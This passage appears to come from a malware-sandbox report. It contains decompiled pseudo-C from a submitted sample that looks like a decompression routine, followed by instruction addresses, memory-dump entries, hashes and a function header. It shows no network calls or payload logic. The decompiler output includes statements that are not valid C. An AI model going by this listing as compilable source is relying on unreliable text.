												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405AB9( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406F19( &(__esi[3]), __edi, 0x101, 0x40840c, 0x40844c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406F19(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40848c, 0x4084c8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









              0x00406742
              0x00406742
              0x00406742
              0x00406742
              0x00406742
              0x00406746
              0x00000000
              0x00000000
              0x0040674c
              0x0040674c
              0x0040674f
              0x00406752
              0x00406757
              0x00406759
              0x0040675c
              0x0040675f
              0x00406762
              0x00406762
              0x00406765
              0x00000000
              0x00000000
              0x00406767
              0x00406767
              0x0040676a
              0x0040676f
              0x00406771
              0x00406774
              0x0040677a
              0x004064d9
              0x004064d9
              0x004064dc
              0x004064e2
              0x004064e8
              0x004064f1
              0x004064f7
              0x004064fa
              0x00406501
              0x00406506
              0x0040650c
              0x00406517
              0x00406517
              0x00406780
              0x00406780
              0x0040678a
              0x00000000
              0x00000000
              0x00406790
              0x00406790
              0x00406794
              0x00406797
              0x00406797
              0x0040679b
              0x004067a1
              0x004067a1
              0x004067a4
              0x004067a7
              0x004067ad
              0x00000000
              0x00000000
              0x004067af
              0x004067d1
              0x004067d1
              0x004067d4
              0x00000000
              0x00000000
              0x004067b1
              0x004067b5
              0x00000000
              0x00000000
              0x004067bb
              0x004067bb
              0x004067be
              0x004067c1
              0x004067c6
              0x004067c8
              0x004067cb
              0x004067ce
              0x004067ce
              0x004067d6
              0x004067d6
              0x004067dc
              0x004067df
              0x004067e2
              0x004067e2
              0x004067e9
              0x004067ed
              0x004067f1
              0x004067f4
              0x004067f7
              0x004067fd
              0x00406802
              0x00000000
              0x00000000
              0x00406804
              0x00406818
              0x00406818
              0x0040681c
              0x00000000
              0x00000000
              0x00406806
              0x00406809
              0x00406809
              0x00406810
              0x00406815
              0x00406815
              0x00406815
              0x0040681e
              0x0040681e
              0x00406821
              0x0040682f
              0x00406835
              0x0040683a
              0x00406840
              0x00406846
              0x0040684c
              0x00406853
              0x00406867
              0x00406867
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e3b
              0x00000000
              0x00000000
              0x00406473
              0x00406473
              0x00000000
              0x00406a6e
              0x00406a6e
              0x00406a72
              0x00406a75
              0x00406a78
              0x00406a7b
              0x00000000
              0x00000000
              0x00406a81
              0x00406a81
              0x00406aa6
              0x00406aa6
              0x00406aa6
              0x00406aa8
              0x00000000
              0x00000000
              0x00406a86
              0x00406a86
              0x00406a8a
              0x00000000
              0x00000000
              0x00406a90
              0x00406a90
              0x00406a93
              0x00406a96
              0x00406a99
              0x00406a9b
              0x00406a9d
              0x00406aa0
              0x00406aa3
              0x00406aa3
              0x00406aa3
              0x00406aaa
              0x00406aaa
              0x00406ab2
              0x00406ab5
              0x00406ab8
              0x00406abb
              0x00406abf
              0x00406ac2
              0x00406ac4
              0x00406ac7
              0x00406ac9
              0x00406add
              0x00406add
              0x00406ae0
              0x00406afa
              0x00406afa
              0x00406afd
              0x00000000
              0x00000000
              0x00406b03
              0x00406b03
              0x00406b06
              0x00000000
              0x00000000
              0x00406b0c
              0x00406b0c
              0x00000000
              0x00406b0c
              0x00406ae2
              0x00406ae5
              0x00406aec
              0x00406aef
              0x00000000
              0x00406aef
              0x00406acb
              0x00406acf
              0x00406ad2
              0x00000000
              0x00000000
              0x00406b17
              0x00406b17
              0x00406b3c
              0x00406b3c
              0x00406b3c
              0x00406b3e
              0x00000000
              0x00000000
              0x00406b1c
              0x00406b1c
              0x00406b20
              0x00000000
              0x00000000
              0x00406b26
              0x00406b26
              0x00406b29
              0x00406b2c
              0x00406b2f
              0x00406b31
              0x00406b33
              0x00406b36
              0x00406b39
              0x00406b39
              0x00406b39
              0x00406b40
              0x00406b48
              0x00406b4b
              0x00406b4e
              0x00406b50
              0x00406b53
              0x00406b53
              0x00406b55
              0x00406b59
              0x00406b5c
              0x00406b5f
              0x00406b62
              0x00000000
              0x00000000
              0x00406b68
              0x00406b68
              0x00406b8d
              0x00406b8d
              0x00406b8d
              0x00406b8f
              0x00000000
              0x00000000
              0x00406b6d
              0x00406b6d
              0x00406b71
              0x00000000
              0x00000000
              0x00406b77
              0x00406b77
              0x00406b7a
              0x00406b7d
              0x00406b80
              0x00406b82
              0x00406b84
              0x00406b87
              0x00406b8a
              0x00406b8a
              0x00406b8a
              0x00406b91
              0x00406b91
              0x00406b99
              0x00406b9c
              0x00406b9f
              0x00406ba2
              0x00406ba6
              0x00406ba9
              0x00406bab
              0x00406bae
              0x00406bb1
              0x00406bcb
              0x00406bcb
              0x00406bce
              0x00000000
              0x00000000
              0x00406bd4
              0x00406bd4
              0x00406bd7
              0x00406bde
              0x00000000
              0x00406bde
              0x00406bb3
              0x00406bb6
              0x00406bbd
              0x00406bc0
              0x00000000
              0x00000000
              0x00406be6
              0x00406be6
              0x00406c0b
              0x00406c0b
              0x00406c0b
              0x00406c0d
              0x00000000
              0x00000000
              0x00406beb
              0x00406beb
              0x00406bef
              0x00000000
              0x00000000
              0x00406bf5
              0x00406bf5
              0x00406bf8
              0x00406bfb
              0x00406bfe
              0x00406c00
              0x00406c02
              0x00406c05
              0x00406c08
              0x00406c08
              0x00406c08
              0x00406c0f
              0x00406c17
              0x00406c1a
              0x00406c1d
              0x00406c1f
              0x00406c22
              0x00406c22
              0x00406c24
              0x00000000
              0x00000000
              0x00406c2a
              0x00406c2a
              0x00406c2d
              0x00406c32
              0x00406c34
              0x00406c3a
              0x00406c3c
              0x00406c51
              0x00406c53
              0x00406c53
              0x00406c3e
              0x00406c44
              0x00406c46
              0x00406c48
              0x00406c48
              0x00406c55
              0x00406c59
              0x00406c5c
              0x00406c62
              0x00406c62
              0x00406c65
              0x00406c65
              0x00406c65
              0x00406c67
              0x00000000
              0x00000000
              0x00406c6d
              0x00406c6d
              0x00406c73
              0x00406c75
              0x00406c9a
              0x00406c9d
              0x00406ca3
              0x00406ca8
              0x00406cae
              0x00406cb4
              0x00406cb6
              0x00406cb9
              0x00406cc2
              0x00406cc8
              0x00406cc8
              0x00406cbb
              0x00406cbd
              0x00406cbf
              0x00406cbf
              0x00406cca
              0x00406cd0
              0x00406cd2
              0x00406cd5
              0x00406cd7
              0x00406cdd
              0x00406cdf
              0x00406ce1
              0x00406ce3
              0x00406ce5
              0x00406ce8
              0x00406cf1
              0x00406cf4
              0x00406cf4
              0x00406cea
              0x00406cea
              0x00406ced
              0x00406ced
              0x00406ce8
              0x00406cdf
              0x00406cf6
              0x00406cf8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406cf8
              0x00406c77
              0x00406c77
              0x00406c7d
              0x00406c83
              0x00406c85
              0x00000000
              0x00000000
              0x00406c87
              0x00406c87
              0x00406c89
              0x00406c8b
              0x00406c94
              0x00406c94
              0x00406c8d
              0x00406c8d
              0x00406c90
              0x00406c90
              0x00406c96
              0x00406c98
              0x00000000
              0x00000000
              0x00406cfe
              0x00406cfe
              0x00406d03
              0x00406d05
              0x00406d06
              0x00406d07
              0x00406d08
              0x00406d0e
              0x00406d11
              0x00406d14
              0x00406d17
              0x00406d19
              0x00406d1f
              0x00406d1f
              0x00406d22
              0x00406d22
              0x00406d22
              0x00406d22
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d30
              0x00406d30
              0x00406d33
              0x00406d36
              0x00406d38
              0x00406dcf
              0x00406dcf
              0x00406dd2
              0x00406dd4
              0x00406dd5
              0x00406dd6
              0x00406dd9
              0x00000000
              0x00406dd9
              0x00406d3e
              0x00406d3e
              0x00406d44
              0x00406d46
              0x00406d6b
              0x00406d6e
              0x00406d74
              0x00406d79
              0x00406d7f
              0x00406d85
              0x00406d87
              0x00406d8a
              0x00406d93
              0x00406d99
              0x00406d99
              0x00406d8c
              0x00406d8e
              0x00406d90
              0x00406d90
              0x00406d9b
              0x00406da1
              0x00406da3
              0x00406da6
              0x00406da8
              0x00406dae
              0x00406db0
              0x00406db2
              0x00406db4
              0x00406db6
              0x00406db9
              0x00406dc2
              0x00406dc5
              0x00406dc5
              0x00406dbb
              0x00406dbb
              0x00406dbe
              0x00406dbe
              0x00406db9
              0x00406db0
              0x00406dc7
              0x00406dc9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406dc9
              0x00406d48
              0x00406d48
              0x00406d4e
              0x00406d54
              0x00406d56
              0x00000000
              0x00000000
              0x00406d58
              0x00406d58
              0x00406d5a
              0x00406d5c
              0x00406d63
              0x00406d63
              0x00406d65
              0x00406d5e
              0x00406d5e
              0x00406d60
              0x00406d60
              0x00406d67
              0x00406d69
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406de1
              0x00406de1
              0x00406de4
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406dec
              0x00406dec
              0x00406dec
              0x00000000
              0x00000000
              0x00000000
              0x0040649a
              0x0040647e
              0x00000000
              0x00406484
              0x00406487
              0x00406491
              0x00406494
              0x00406497
              0x00000000
              0x00406497
              0x0040647e
              0x004064a2
              0x004064a5
              0x004064a9
              0x004064b3
              0x004064bd
              0x004064c0
              0x004064c6
              0x004065fa
              0x004065fc
              0x00406602
              0x00406605
              0x00406608
              0x00000000
              0x00406608
              0x004064cc
              0x004064cc
              0x004064cd
              0x00406525
              0x00406525
              0x0040652c
              0x004065d2
              0x004065d2
              0x004065d7
              0x004065da
              0x004065df
              0x004065e2
              0x004065e7
              0x004065ea
              0x004065ef
              0x004065f2
              0x004065f2
              0x00000000
              0x00406532
              0x00406532
              0x00406532
              0x00406532
              0x00406536
              0x00406536
              0x00406558
              0x0040655b
              0x0040655d
              0x00406560
              0x00406565
              0x0040653b
              0x0040653b
              0x00406540
              0x00406542
              0x00406544
              0x00406549
              0x0040654f
              0x00406554
              0x00406556
              0x00406556
              0x0040654b
              0x0040654b
              0x0040654b
              0x00406549
              0x00000000
              0x00406567
              0x00406594
              0x00406599
              0x0040659b
              0x0040659c
              0x0040659e
              0x0040659f
              0x0040659f
              0x0040659f
              0x004065c7
              0x004065cc
              0x004065cc
              0x00000000
              0x004065cc
              0x00406565
              0x0040652c
              0x004064cf
              0x004064cf
              0x004064d0
              0x0040651a
              0x00000000
              0x0040651a
              0x004064d2
              0x004064d3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040662f
              0x0040662f
              0x0040662f
              0x00406632
              0x00000000
              0x00000000
              0x0040660f
              0x0040660f
              0x00406613
              0x00000000
              0x00000000
              0x00406619
              0x00406619
              0x0040661c
              0x0040661f
              0x00406624
              0x00406626
              0x00406629
              0x0040662c
              0x0040662c
              0x0040662c
              0x00406634
              0x00406634
              0x00406637
              0x00406639
              0x0040663e
              0x00406641
              0x00406643
              0x00406646
              0x00000000
              0x00000000
              0x0040664c
              0x0040664c
              0x0040664e
              0x00000000
              0x00000000
              0x00406654
              0x00406654
              0x00406658
              0x00000000
              0x00000000
              0x0040665e
              0x0040665e
              0x00406661
              0x00406663
              0x00406701
              0x00406701
              0x00406704
              0x00406706
              0x00406706
              0x00406709
              0x0040670c
              0x0040670e
              0x00406710
              0x00406712
              0x00406712
              0x0040671b
              0x00406720
              0x00406723
              0x00406726
              0x00406729
              0x0040672c
              0x0040672c
              0x0040672c
              0x0040672f
              0x00406735
              0x00406735
              0x0040673b
              0x0040673b
              0x0040673b
              0x00000000
              0x0040672f
              0x00406669
              0x00406669
              0x0040666f
              0x00406672
              0x00406674
              0x0040669f
              0x004066a2
              0x004066a8
              0x004066ad
              0x004066b3
              0x004066b9
              0x004066bb
              0x004066be
              0x004066c7
              0x004066cd
              0x004066cd
              0x004066c0
              0x004066c2
              0x004066c4
              0x004066c4
              0x004066cf
              0x004066d5
              0x004066d8
              0x004066da
              0x004066dc
              0x004066e2
              0x004066e4
              0x004066e6
              0x004066e9
              0x004066f2
              0x004066f2
              0x004066f4
              0x004066eb
              0x004066eb
              0x004066ee
              0x004066ee
              0x004066f6
              0x004066f6
              0x004066e4
              0x004066f9
              0x004066fb
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004066fb
              0x00406676
              0x00406676
              0x0040667c
              0x00406682
              0x00406684
              0x00000000
              0x00000000
              0x00406686
              0x00406686
              0x00406688
              0x0040668a
              0x0040668d
              0x00406694
              0x00406694
              0x00406696
              0x0040668f
              0x0040668f
              0x00406691
              0x00406691
              0x00406698
              0x0040669a
              0x0040669d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004067a1
              0x004067a4
              0x004067a7
              0x004067ad
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406984
              0x00406984
              0x00406984
              0x00406987
              0x0040698a
              0x0040698c
              0x0040698f
              0x00406995
              0x0040699c
              0x0040699e
              0x00000000
              0x00000000
              0x00406872
              0x00406872
              0x0040689a
              0x0040689a
              0x0040689a
              0x0040689c
              0x00000000
              0x00000000
              0x0040687a
              0x0040687a
              0x0040687e
              0x00000000
              0x00000000
              0x00406884
              0x00406884
              0x00406887
              0x0040688a
              0x0040688d
              0x0040688f
              0x00406891
              0x00406894
              0x00406897
              0x00406897
              0x00406897
              0x0040689e
              0x0040689e
              0x004068a6
              0x004068a9
              0x004068af
              0x004068b2
              0x004068b6
              0x004068ba
              0x004068bd
              0x004068c0
              0x004068d8
              0x004068d8
              0x004068db
              0x004068e9
              0x004068ec
              0x004068dd
              0x004068dd
              0x004068df
              0x004068e6
              0x004068e6
              0x00406915
              0x00406915
              0x00406915
              0x00406918
              0x0040691a
              0x00000000
              0x00000000
              0x004068f5
              0x004068f5
              0x004068f9
              0x00000000
              0x00000000
              0x004068ff
              0x004068ff
              0x00406902
              0x00406905
              0x00406908
              0x0040690a
              0x0040690c
              0x0040690f
              0x00406912
              0x00406912
              0x00406912
              0x0040691c
              0x0040691c
              0x0040691e
              0x00406920
              0x0040692b
              0x0040692e
              0x00406931
              0x00406933
              0x00406935
              0x00406937
              0x0040693a
              0x0040693d
              0x00406942
              0x00406945
              0x00406948
              0x0040694b
              0x00406952
              0x00406955
              0x00406957
              0x00000000
              0x00000000
              0x0040695d
              0x0040695d
              0x00406961
              0x00406972
              0x00406972
              0x00406972
              0x00406974
              0x00406974
              0x00406978
              0x00406978
              0x00406978
              0x0040697a
              0x0040697b
              0x0040697e
              0x0040697e
              0x0040697e
              0x00406981
              0x00000000
              0x00406981
              0x00406963
              0x00406963
              0x00406966
              0x00000000
              0x00000000
              0x0040696c
              0x0040696c
              0x00000000
              0x0040696c
              0x004068c2
              0x004068c2
              0x004068c4
              0x004068c6
              0x004068c9
              0x004068cc
              0x004068d0
              0x004068d0
              0x004069a4
              0x004069a4
              0x004069a7
              0x004069ae
              0x004069b2
              0x004069b4
              0x004069b7
              0x004069ba
              0x004069bf
              0x004069c2
              0x004069c4
              0x004069c5
              0x004069c8
              0x004069d3
              0x004069d6
              0x004069ed
              0x004069f2
              0x004069f9
              0x004069fe
              0x00406a02
              0x00406a04
              0x00406a04
              0x00406a04
              0x00406a07
              0x00406a09
              0x00000000
              0x00406a0f
              0x00406a0f
              0x00406a13
              0x00406a1e
              0x00406a31
              0x00406a36
              0x00406a3b
              0x00406a3d
              0x00000000
              0x00000000
              0x00406a43
              0x00406a43
              0x00406a46
              0x00406a48
              0x00406a56
              0x00406a56
              0x00406a59
              0x00406a59
              0x00406a5c
              0x00406a5f
              0x00406a62
              0x00406a65
              0x00406a68
              0x00406a6b
              0x00000000
              0x00406a6b
              0x00406a4a
              0x00406a4a
              0x00406a50
              0x00000000
              0x00000000
              0x00000000
              0x00406a50
              0x00000000
              0x00000000
              0x00000000
              0x00406def
              0x00406def
              0x00406df5
              0x00406dfb
              0x00406e00
              0x00406e06
              0x00406e0c
              0x00406e0e
              0x00406e11
              0x00406e1a
              0x00406e20
              0x00406e20
              0x00406e13
              0x00406e15
              0x00406e17
              0x00406e17
              0x00406e22
              0x00406e24
              0x00406e27
              0x00406e62
              0x00406e62
              0x00000000
              0x00406e29
              0x00406e29
              0x00406e29
              0x00406e2f
              0x00406e32
              0x00406e34
              0x00406e69
              0x00406e6b
              0x00000000
              0x00406e6b
              0x00000000
              0x00406e34
              0x00000000
              0x00406473
              0x00406e41
              0x00000000
              0x00406e41
              0x00406855
              0x00406857
              0x00000000
              0x00000000
              0x00406859
              0x00406859
              0x0040685c
              0x00000000
              0x0040685c
              0x004067a1
              0x00406762
              0x00406e46
              0x00406e49
              0x00406e4b
              0x00406e54
              0x00406e5a
              0x00000000

              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
              • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
              • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
              • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406F19 Relevance: .3, Instructions: 300COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406F19(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
